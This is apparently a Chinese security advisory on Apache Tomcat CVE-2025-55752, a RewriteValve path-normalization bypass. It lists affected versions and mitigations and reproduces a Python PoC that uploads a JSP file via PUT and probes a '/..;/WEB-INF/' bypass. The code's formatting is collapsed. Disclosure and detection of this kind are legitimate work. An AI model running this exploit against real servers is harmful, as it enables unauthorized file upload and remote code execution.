文章总结： ApacheTomcat的RewriteValve组件存在目录遍历漏洞CVE-2025-55752，因修复回归问题导致攻击者可绕过/WEB-INF/和/META-INF/防护机制，在启用PUT或WebDAV时上传恶意文件实现RCE。影响版本包括11.0.0-M1至11.0.10、10.1.0-M1至10.1.44、9.0.0.M11至9.0.108。文档提供检测脚本POC，建议禁用PUT方法或RewriteValve组件缓解风险。 综合评分： 72 文章分类： 漏洞分析,漏洞POC,WEB安全,漏洞预警,安全工具

CVE-2025-55752｜Apache Tomcat目录遍历漏洞（POC）

alicy alicy

信安百科

2025年11月16日 18:00 河北

在小说阅读器读本章

去阅读

0x00 前言

Tomcat是Apache软件基金会（Apache Software Foundation）的Jakarta项目中的一个核心项目，由Apache、Sun和其他一些公司及个人共同开发而成。

Tomcat服务器是一个免费的开放源代码的Web应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP程序的首选。

Tomcat和Nginx、Apache(httpd)、lighttpd等Web服务器一样，具有处理HTML页面的功能，另外它还是一个Servlet和JSP容器，独立的Servlet容器是Tomcat的默认模式。不过，Tomcat处理静态HTML的能力不如Nginx/Apache服务器。

0x01 漏洞描述

Tomcat的RewriteValve组件提供URL重写功能，类似于Apache HTTP Server的mod_rewrite模块，允许开发者根据规则动态修改请求URL，广泛用于URL美化、请求转发和访问控制等场景。

该漏洞因修复程序出现回归问题所致，在URL重写过程中，系统先对URL进行规范化处理，再执行解码操作，这使得攻击者能够绕过针对/WEB-INF/和/META-INF/的安全防护机制。一旦启用PUT或WebDAV功能，攻击者可借此上传恶意文件并实现远程代码执行（RCE）。虽然PUT请求一般仅对可信用户开放，但配置不当会导致该漏洞被恶意利用。

0x02 CVE编号

CVE-2025-55752

0x03 影响版本

11.0.0-M1 <= Apache Tomcat <=&nbsp;11.0.1010.1.0-M1 <= Apache Tomcat <=&nbsp;10.1.449.0.0.M11 <= Apache Tomcat <=&nbsp;9.0.108

0x04 漏洞详情

POC：

https://github.com/TAM-K592/CVE-2025-55752

import requestsimport argparseimport urllib3import sysfrom urllib.parse import quote
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BANNER = """CVE-2025-55752 Tomcat Path Bypass & Upload Detection Script============================================================This tool attempts to exploit a Rewrite Valve + normalization bypass to upload a test JSP file into a protected location (like /WEB-INF) and verify if the server is vulnerable to CVE-2025-55752."""
def attempt_put_upload(target, filename, payload, verify_ssl):    upload_path = f"/{filename}"    url = f"{target}{upload_path}"    try:        print(f"[+] Attempting to upload payload to: {url}")        response = requests.put(url, data=payload, verify=verify_ssl, timeout=10)        if response.status_code in [200, 201, 204]:            print(f"[+] Upload successful! Response code: {response.status_code}")            return upload_path        else:            print(f"[-] Upload failed! Response code: {response.status_code}")            return None    except Exception as e:        print(f"[!] Upload error: {e}")        return None
def check_access(target, path, verify_ssl):    bypass_path = f"/..;{path}"    url = f"{target}{bypass_path}"    try:        print(f"[+] Checking access to: {url}")        response = requests.get(url, verify=verify_ssl, timeout=10)        if response.status_code == 200:            print("[+] Bypass successful! Target may be vulnerable.")            return True        else:            print(f"[-] Access denied or not vulnerable (HTTP {response.status_code}).")            return False    except Exception as e:        print(f"[!] Access check error: {e}")        return False
def&nbsp;main():&nbsp; &nbsp; parser = argparse.ArgumentParser(description="CVE-2025-55752 Exploit & Detection Tool")&nbsp; &nbsp; parser.add_argument("url",&nbsp;help="Target base URL (e.g., http://127.0.0.1:8080)")&nbsp; &nbsp; parser.add_argument("--filename", default="shell.jsp",&nbsp;help="Filename to upload (default: shell.jsp)")&nbsp; &nbsp; parser.add_argument("--payload", default="<% out.println(\"Bypassed!\"); %>",&nbsp;help="Payload content to upload")&nbsp; &nbsp; parser.add_argument("--check", action="store_true",&nbsp;help="Only check for path bypass without uploading")&nbsp; &nbsp; parser.add_argument("--no-ssl-verify", action="store_true",&nbsp;help="Disable SSL certificate verification")&nbsp; &nbsp; args = parser.parse_args()
&nbsp; &nbsp;&nbsp;print(BANNER)&nbsp; &nbsp; verify_ssl =&nbsp;not&nbsp;args.no_ssl_verify
&nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;args.url.startswith("http"):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print("[-] Please include http:// or https:// in the URL")&nbsp; &nbsp; &nbsp; &nbsp; sys.exit(1)
&nbsp; &nbsp;&nbsp;if&nbsp;args.check:&nbsp; &nbsp; &nbsp; &nbsp; check_access(args.url,&nbsp;f"/WEB-INF/{args.filename}", verify_ssl)&nbsp; &nbsp;&nbsp;else:&nbsp; &nbsp; &nbsp; &nbsp; uploaded_path = attempt_put_upload(args.url, args.filename, args.payload, verify_ssl)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;uploaded_path:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; check_access(args.url,&nbsp;f"/WEB-INF/{args.filename}", verify_ssl)
if&nbsp;__name__ ==&nbsp;"__main__":&nbsp; &nbsp; main()

0x05 参考链接

https://lists.apache.org/thread/n05kjcwyj1s45ovs8ll1qrrojhfb1tog

推荐阅读：

CVE-2025-24813｜Apache Tomcat远程代码执行漏洞（POC）

CVE-2025-56383｜Notepad++ DLL劫持漏洞（POC）

CVE-2025-49113｜Roundcube Webmail反序列化漏洞（POC）

Ps：国内外安全热点分享，欢迎大家分享、转载，请保证文章的完整性。文章中出现敏感信息和侵权内容，请联系作者删除信息。信息安全任重道远，感谢您的支持！！！

本公众号的文章及工具仅提供学习参考，由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害，均由使用者本人负责,本公众号及文章作者不为此承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：信安百科 alicy alicy《CVE-2025-55752｜Apache Tomcat目录遍历漏洞（POC）》